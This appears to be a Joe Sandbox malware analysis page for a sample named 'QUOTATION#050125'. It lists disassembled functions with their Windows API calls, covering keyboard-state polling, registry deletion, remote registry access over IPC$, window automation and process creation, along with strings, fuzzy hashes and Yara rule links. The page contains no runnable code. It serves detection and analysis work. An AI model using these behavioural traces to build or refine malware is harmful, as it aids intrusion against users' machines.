Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00551990,000000FF,00000000,00000030), ref: 004EBFAC
SetMenuItemInfoW.USER32(00551990,00000004,00000000,00000030), ref: 004EBFE1
Sleep.KERNEL32(000001F4), ref: 004EBFF3
GetMenuItemCount.USER32(?), ref: 004EC039
GetMenuItemID.USER32(?,00000000), ref: 004EC056
GetMenuItemID.USER32(?,-00000001), ref: 004EC082
GetMenuItemID.USER32(?,?), ref: 004EC0C9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004EC10F
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004EC124
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004EC145

Strings

0, xrefs: 004EBF3D

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 2129e87ef6ceb685975d0ac5c1113aaf097fa80d752999647dbe076f61b7594b
Instruction ID: e4d31548d5eefd8b36ed0399ff3e583fc03c28b4b29cb4e9a1019af13bfb9bdc
Opcode Fuzzy Hash: 2129e87ef6ceb685975d0ac5c1113aaf097fa80d752999647dbe076f61b7594b
Instruction Fuzzy Hash: 76617070900385AFDF11CFA6DC88AEFBFB9EB05346F10415AE851A3291C739AD06DB65

Function 0050CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0050CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0050CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0050CD48

Part of subcall function 0050CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0050CCAA
Part of subcall function 0050CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0050CCBD
Part of subcall function 0050CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0050CCCF
Part of subcall function 0050CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0050CD05
Part of subcall function 0050CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0050CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0050CCF3

Strings

advapi32.dll, xrefs: 0050CCB8
RegDeleteKeyExW, xrefs: 0050CCC9

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 87aecb4cde926dcdf0315f8e85cb78c7f2f4a94cf2c3b679d2e59b85950631f7
Instruction ID: 1372c088a66165a3c7f81ceeedbd4955e66e318c8c52c2129c36ce1e2f81806e
Opcode Fuzzy Hash: 87aecb4cde926dcdf0315f8e85cb78c7f2f4a94cf2c3b679d2e59b85950631f7
Instruction Fuzzy Hash: 08316172981129BBD7208B54DC88EFFBF7CFF56750F004265B905E6290D7349E49EAA0

Function 004A00C6 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 81COMMON

Download Yara Rule

Strings

SleepConditionVariableCS, xrefs: 004A0154
kernel32.dll, xrefs: 004A0133
WakeAllConditionVariable, xrefs: 004A0162
api-ms-win-core-synch-l1-2-0.dll, xrefs: 004A0122
InitializeConditionVariable, xrefs: 004A0148

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: AddressProc$HandleModule$CountCriticalInitializeSectionSpin
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 798235881-1714406822
Opcode ID: c9815946812c8cec9cba5e8031c7d278f000169d9546c375472f47541c4ffd1f
Instruction ID: 9fd4ac269007c136a240e2bc398461326d6322c67c360d9cd7a490230a719943
Opcode Fuzzy Hash: c9815946812c8cec9cba5e8031c7d278f000169d9546c375472f47541c4ffd1f
Instruction Fuzzy Hash: F52129326C47016BEB105BA4BC56FEA3BA4EB66B55F00413BFC01D23D1DB6A98049A98

Function 004EE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 004EE6B4

Part of subcall function 0049E551: timeGetTime.WINMM(?,?,004EE6D4), ref: 0049E555

Sleep.KERNEL32(0000000A), ref: 004EE6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 004EE705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 004EE727
SetActiveWindow.USER32 ref: 004EE746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004EE754
SendMessageW.USER32(00000010,00000000,00000000), ref: 004EE773
Sleep.KERNEL32(000000FA), ref: 004EE77E
IsWindow.USER32 ref: 004EE78A
EndDialog.USER32(00000000), ref: 004EE79B

Strings

BUTTON, xrefs: 004EE719

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: feb65b1c00389027690e472519d246f5b23c7fb7565ca6df1b4f5c70afafc61b
Instruction ID: 72c9bcc950515f15136c75b3215f339ab9d2b84b8475371b48c4ba246c614e31
Opcode Fuzzy Hash: feb65b1c00389027690e472519d246f5b23c7fb7565ca6df1b4f5c70afafc61b
Instruction Fuzzy Hash: 4B218074280381AFEB005F23EC99B663F69F77634BF104826F405822A1DB669C08BB19

Function 004EE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004EEA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004EEA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004EEA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004EEA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004EEAA7

Strings

play PlayMe wait, xrefs: 004EEA91
alias PlayMe, xrefs: 004EEA36
play PlayMe, xrefs: 004EEAA2
open , xrefs: 004EEA0C
status PlayMe mode, xrefs: 004EEA58
close PlayMe, xrefs: 004EEA6E, 004EEA9B

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: 5f89ba1f9f18a57743a639a22b451e522f5439aef7e094da408e1655b72334ef
Instruction ID: f91c4503e125e51b2c523a253131c89e6cd7ef04c29d347a8442ec8794c07a46
Opcode Fuzzy Hash: 5f89ba1f9f18a57743a639a22b451e522f5439aef7e094da408e1655b72334ef
Instruction Fuzzy Hash: 6D11427165025979D720B763DC4AEFF6E7CFBD2F48F00082EB801A20D1EAB40905C6B5

Function 004E9F91 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 004EA012
SetKeyboardState.USER32(?), ref: 004EA07D
GetAsyncKeyState.USER32(000000A0), ref: 004EA09D
GetKeyState.USER32(000000A0), ref: 004EA0B4
GetAsyncKeyState.USER32(000000A1), ref: 004EA0E3
GetKeyState.USER32(000000A1), ref: 004EA0F4
GetAsyncKeyState.USER32(00000011), ref: 004EA120
GetKeyState.USER32(00000011), ref: 004EA12E
GetAsyncKeyState.USER32(00000012), ref: 004EA157
GetKeyState.USER32(00000012), ref: 004EA165
GetAsyncKeyState.USER32(0000005B), ref: 004EA18E
GetKeyState.USER32(0000005B), ref: 004EA19C

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: a882ddbe7487bb581536032a62832ddb22d3704c80c6344f8e0b05f08e2935c7
Instruction ID: 53c7d4f2f5ecb42fb6c7e1e986755b21a65b1fb14b5d699d6f72f2d941746c54
Opcode Fuzzy Hash: a882ddbe7487bb581536032a62832ddb22d3704c80c6344f8e0b05f08e2935c7
Instruction Fuzzy Hash: 0851C5209047C829FB35DB6288147EBEFB59F12385F08859FD5C2572C2DA58BE4CC76A

Function 004E5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 004E5CE2
GetWindowRect.USER32(00000000,?), ref: 004E5CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 004E5D59
GetDlgItem.USER32(?,00000002), ref: 004E5D69
GetWindowRect.USER32(00000000,?), ref: 004E5D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 004E5DCF
GetDlgItem.USER32(?,000003E9), ref: 004E5DDD
GetWindowRect.USER32(00000000,?), ref: 004E5DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 004E5E31
GetDlgItem.USER32(?,000003EA), ref: 004E5E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004E5E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 004E5E67

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 67a874379044a9d67fcf50fe8f4e774f4bb97ca2f68e9c0649a2b90bdb714f6a
Instruction ID: 7e030ce9805d7910c35abb6cd58ec9e02ad31ffabe0f1ca10a889b58ba5904a2
Opcode Fuzzy Hash: 67a874379044a9d67fcf50fe8f4e774f4bb97ca2f68e9c0649a2b90bdb714f6a
Instruction Fuzzy Hash: D0512E70B40605AFDF18CF69DD89AAEBBB5FB58305F108229F516E7290D7749E04CB50

Function 00498BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00498F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00498BE8,?,00000000,?,?,?,?,00498BBA,00000000,?), ref: 00498FC5

DestroyWindow.USER32(?), ref: 00498C81
KillTimer.USER32(00000000,?,?,?,?,00498BBA,00000000,?), ref: 00498D1B
DestroyAcceleratorTable.USER32(00000000), ref: 004D6973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00498BBA,00000000,?), ref: 004D69A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00498BBA,00000000,?), ref: 004D69B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00498BBA,00000000), ref: 004D69D4
DeleteObject.GDI32(00000000), ref: 004D69E6

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 3d88002b3244860d5d2cdb4e2673c96158ad4409b64aec2314f6fcea2ec9068c
Instruction ID: cf97770547f055d77ffed5edbfa2acdf10471d777d880893d2106b1e8145a39a
Opcode Fuzzy Hash: 3d88002b3244860d5d2cdb4e2673c96158ad4409b64aec2314f6fcea2ec9068c
Instruction Fuzzy Hash: C7618B30501B00DFCF219F18D968B2A7FF1FB62316F14852EE04296760CB39AD85EB99

Function 00499838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00499944: GetWindowLongW.USER32(?,000000EB), ref: 00499952

GetSysColor.USER32(0000000F), ref: 00499862

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: eee28729cb5c591e5f13456088c2bb8a1ad6866c20787d2ff813e8645cb84599
Instruction ID: f3603838baffd8b401aedd193d8d03a35b6c9a3bb1183c15bc18229b3c490b70
Opcode Fuzzy Hash: eee28729cb5c591e5f13456088c2bb8a1ad6866c20787d2ff813e8645cb84599
Instruction Fuzzy Hash: C9419031184600AFDF20AF3C9C94BBA3F65AB16320F14466EE9A2872E1E7359C46DB15

Function 004E365B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 004E369C
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 004E3797
GetClassNameW.USER32(?,?,00000400), ref: 004E380C
GetDlgCtrlID.USER32(?), ref: 004E385D
GetWindowRect.USER32(?,?), ref: 004E3882
GetParent.USER32(?), ref: 004E38A0
ScreenToClient.USER32(00000000), ref: 004E38A7
GetClassNameW.USER32(?,?,00000100), ref: 004E3921
GetWindowTextW.USER32(?,?,00000400), ref: 004E395D

Strings

%s%u, xrefs: 004E3734

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
String ID: %s%u
API String ID: 1412819556-679674701
Opcode ID: bccdbdaa1fa6f98719ee419c6d21ad46a714c5c1bb51424342c09344fffc5115
Instruction ID: 8128474d80c415cc693ebcef851540ebf44bf0d01377d106a3b49a552319f883
Opcode Fuzzy Hash: bccdbdaa1fa6f98719ee419c6d21ad46a714c5c1bb51424342c09344fffc5115
Instruction Fuzzy Hash: 3C91E771200246AFD715DF26C889BEBF7A8FF44316F00851AF995C3291D738EA45CB95

Function 004E96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,004CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 004E9717
LoadStringW.USER32(00000000,?,004CF7F8,00000001), ref: 004E9720
GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,004CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 004E9742
LoadStringW.USER32(00000000,?,004CF7F8,00000001), ref: 004E9745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 004E9866

Strings

%s (%d) : ==> %s: %s %s, xrefs: 004E984A
^ ERROR, xrefs: 004E97FB
Error: , xrefs: 004E981D
Line %d (File "%s"):, xrefs: 004E978F
Line %d:, xrefs: 004E97A0

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 4072794657-2268648507
Opcode ID: 3b6cecd457965ed24bccca5fc5e8e1f8b5fc65b4e078a954033b3b98f1f5b8db
Instruction ID: 47b2b213f9a9d519a581aa1b4345ccd2a8c74045f7a99ad994bf4ba248ac0c40
Opcode Fuzzy Hash: 3b6cecd457965ed24bccca5fc5e8e1f8b5fc65b4e078a954033b3b98f1f5b8db
Instruction Fuzzy Hash: 1F414272800219AACF04FFE2CD86EEE7778AF15749F14042AF50572092EB796F49CB65

Function 004E06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004E07A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004E07BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004E07DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 004E0804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 004E082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004E0837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004E083C

Strings

SOFTWARE\Classes\, xrefs: 004E070E
\IPC$, xrefs: 004E0784
\CLSID, xrefs: 004E0724

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 3030280669-22481851
Opcode ID: 3a57308e245ba9cccfb3cd062cf92d3d9a600249102f54ef8fe7ef4336dc346f
Instruction ID: 05b6ac63de2330c6917a8b28522d4262d8db6f2714b24159079c883cfe36d682
Opcode Fuzzy Hash: 3a57308e245ba9cccfb3cd062cf92d3d9a600249102f54ef8fe7ef4336dc346f
Instruction Fuzzy Hash: DB412872C10229ABDF11FFA5DC858EEB778BF14744B04452AE911A3161EB78AE44CBA4

Function 004F3D1E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004F3D40
CreateDirectoryW.KERNEL32(?,00000000), ref: 004F3D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 004F3DBE
RemoveDirectoryW.KERNEL32(?), ref: 004F3DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 004F3E55
CloseHandle.KERNEL32(00000000), ref: 004F3E60
CloseHandle.KERNEL32(00000000), ref: 004F3E6B

Strings

:, xrefs: 004F3D82
\??\%s, xrefs: 004F3D5B
\, xrefs: 004F3D77

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
String ID: :$\$\??\%s
API String ID: 3827137101-3457252023
Opcode ID: 738119a51b11898ce63f1c01d6214e8df057cb0ff841477e142a08d982d09acd
Instruction ID: 65db207454281cd227ba954dcf087c84d3bb7e55cfa3362a052fc33d06d1a836
Opcode Fuzzy Hash: 738119a51b11898ce63f1c01d6214e8df057cb0ff841477e142a08d982d09acd
Instruction Fuzzy Hash: 2731B275940119ABDB209FA0DC48FEF3BBCEF89745F1040AAF615D2160E7789744CB28

Function 00513F98 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0051403B
CreateCompatibleDC.GDI32(00000000), ref: 00514042
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00514055
SelectObject.GDI32(00000000,00000000), ref: 0051405D
GetPixel.GDI32(00000000,00000000,00000000), ref: 00514068
DeleteDC.GDI32(00000000), ref: 00514072
GetWindowLongW.USER32(?,000000EC), ref: 0051407C
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00514092
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 0051409E

Strings

static, xrefs: 00513FD3

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 92c9af24a1a75e6554901c5193d9db02c160aac7088bf295f432fc454b217945
Instruction ID: d4474cdcb1b52c959b43936f11d8f9a00b16f239dabefdae7436fce07e53bb2e
Opcode Fuzzy Hash: 92c9af24a1a75e6554901c5193d9db02c160aac7088bf295f432fc454b217945
Instruction Fuzzy Hash: 6B317A32181215BBEF219FA8CC08FEA3F69FF1D324F114211FA19A60A0C776D865EB54

Function 0050AFF9 Relevance: 16.9, APIs: 11, Instructions: 418processCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0050B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0050B1D4
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0050B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0050B236

Part of subcall function 004F05A7: GetStdHandle.KERNEL32(000000F6), ref: 004F05C6

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0050B3B6
